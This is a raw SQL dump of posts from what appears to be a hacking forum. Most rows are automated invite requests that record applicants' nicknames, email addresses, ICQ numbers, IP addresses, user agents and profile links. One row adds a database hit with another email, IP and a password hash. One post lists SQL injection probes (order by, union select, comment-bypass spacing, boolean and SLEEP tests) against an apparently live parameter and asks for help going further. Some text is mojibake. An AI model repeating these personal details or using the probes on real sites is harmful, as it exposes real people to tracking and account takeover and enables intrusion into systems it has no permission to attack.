\n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://robloxxxxi.blogspot.com/.../all-absurd-malls-at-roblox-are.html | http://robloxxxxi.blogspot.com/.../all-absurd-malls-at-roblox-are.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1716, 1532, 0, 'Invite', 2, '{$name}', 1408521565, '[SIZE=\'4\'][COLOR=\'Sienna\']ybo[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: nothing@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.45.72.104\n[*][b]real ip[/b]: 176.45.72.104\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1717, 1533, 0, 'Invite', 2, '{$name}', 1408522520, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1718, 1534, 0, 'Invite', 2, '{$name}', 1408523662, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@111.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1719, 1535, 0, 'Invite', 2, '{$name}', 1408523768, '[SIZE=\'4\'][COLOR=\'Sienna\']ddddddd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@email.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 158.255.211.156\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : ddddddd : se_m_ja@wp.pl : 212.76.62.149 : 94359a18e14e99698cc7e969bde40b08\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.odnoklassniki.ru/profile/549654266711 | http://www.odnoklassniki.ru/profile/549654266711 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1720, 1536, 0, 'Invite', 2, '{$name}', 1408524427, '[SIZE=\'4\'][COLOR=\'Sienna\']Nick123[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: mail@mai.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://nick123.1nsk.ru | nick123.1nsk.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1721, 1537, 0, 'Invite', 2, '{$name}', 1408531215, '[SIZE=\'4\'][COLOR=\'Sienna\']Maza2000[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 7370377\n[b]e-mail[/b]: ppp97@inbox.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.40.44.161\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maza2000.muzy.com | maza2000.muzy.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1722, 1063, 1072, 'Psych0tr1a', 11, '', 1408533325, 'ÿþûучøтÑÂѠøýúûуôøть xss ø sqli тþûьúþ ò тþü ÑÂûучðõ õÑÂûø ÑÂтþ rfi//\nтþûьúþ òþт úþüу ýуöýþ ñуôõт øýúûуôøть тðú?))', 1, 0, '', 0, 1, 0, 0, 0), (1724, 1538, 0, 'lumbricus', 39, 'SQL - Injection HELP', 1408535071, 'Hello Comrades,\r\n\r\nI am really stuck, and I appreciate any advice/help. \r\n\r\nzambucca=12\' (Custom ERROR)\r\n\r\nzambucca=12 order by 1--+- (Custom ERROR)\r\n\r\nzambucca=12/**/order/**/by/**/1# (NO ERROR)\r\n\r\nzambucca=12/**/order/**/by/**/5# (Query has 5 columns total)\r\n\r\nzambucca=-12/**/union/**/all/**/select/**/1,2,3,4,5# (Boolean Valid Page No error - union seems not possible ( NO REFLECTION )!? )\r\n\r\nzambucca=12/**/AND/**/2=2# (TRUE)\r\n\r\nzambucca=12/**/AND/**/2a=2a# (ERROR)\r\n\r\nSo it seems as if it does not like the STRING VALUE only INTEGER\r\n\r\nzambucca=12 AND SLEEP(5) (Sleep too long not reliable)\r\n\r\nIs there anything I can do?', 1, 0, '', 0, 1, 0, 0, 0), (1725, 1539, 0, 'Invite', 2, '{$name}', 1408537312, '[SIZE=\'4\'][COLOR=\'Sienna\']M-A[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.125.111\n[*][b]real ip[/b]: 197.28.125.111\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1726, 1540, 0, 'ropertus', 33, '[close]', 1408547249, 'Got them what they were looking for.\r\n\r\nDelete thread please.', 1, 1, '', 4, 1, 0, 0, 0), (1743, 1552, 0, 'Invite', 2, '{$name}', 1408666908, '[SIZE=\'4\'][COLOR=\'Sienna\']pirate[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: piratediablo@xampp.jp\n[b]e-mail[/b]: pirate@superrito.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.118.211.91\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/piratestationinferno | http://vk.com/piratestationinferno \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1727, 1541, 0, 'Invite', 2, '{$name}', 1408553209, '[SIZE=\'4\'][COLOR=\'Sienna\']tester_mine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 1102931\n[b]e-mail[/b]: asjsjjsa@aaa.aa\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/wall-68044219_7626?reply=7733 | http://vk.com/wall-68044219_7626?reply=7733 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1729, 1096, 1155, 'w0rm', 1, '', 1408556494, 'mod_kz : Suse2012', 1, 0, '', 0, 1, 0, 0, 0), (1730, 1542, 0, 'Invite', 2, '{$name}', 1408560598, '[SIZE=\'4\'][COLOR=\'Sienna\']vinith[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ethical hacker\n[b]e-mail[/b]: hazare.vinith@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 183.82.233.196\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vinith.net | vinith.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1732, 1543, 0, 'Invite', 2, '{$name}', 1408604486, '[SIZE=\'4\'][COLOR=\'Sienna\']darty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 671410590\n[b]e-mail[/b]: cultive94@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.180.105.248\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://darty.it | darty.it \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1733, 1544, 0, 'Invite', 2, '{$name}', 1408604678, '[SIZE=\'4\'][COLOR=\'Sienna\']darty[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 671410590\n[b]e-mail[/b]: cultive94@hotmail.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 176.180.105.248\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://darty.it | darty.it \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1734, 1545, 0, 'Invite', 2, '{$name}', 1408611665, '[SIZE=\'4\'][COLOR=\'Sienna\']c000z[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: d-d@exploit.im\n[b]e-mail[/b]: lockwood.selena@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.221.162.226\n[*][b]real ip[/b]: 37.221.162.226\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ink361.com/app/users/ig-35143416/.../photos | http://ink361.com/app/users/ig-35143416/.../photos \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1735, 1546, 0, 'Invite', 2, '{$name}', 1408612146, '[SIZE=\'4\'][COLOR=\'Sienna\']donlee[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 111222\n[b]e-mail[/b]: leedon20@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.142.83.68\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/Donleebaby | https://twitter.com/Donleebaby \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1736, 1547, 0, 'Invite', 2, '{$name}', 1408613470, '[SIZE=\'4\'][COLOR=\'Sienna\']anggeraw[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: skynet.netsky@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 180.214.233.36\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://anggeraw.deviantart.com | anggeraw.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1738, 1548, 0, 'Invite', 2, '{$name}', 1408623446, '[SIZE=\'4\'][COLOR=\'Sienna\']s1ckness[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 6548421354\n[b]e-mail[/b]: Lulzsec@Mail2tor.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.111.127.24\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s1ckness.tumblr.com | s1ckness.tumblr.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1739, 1549, 0, 'Invite', 2, '{$name}', 1408627221, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request 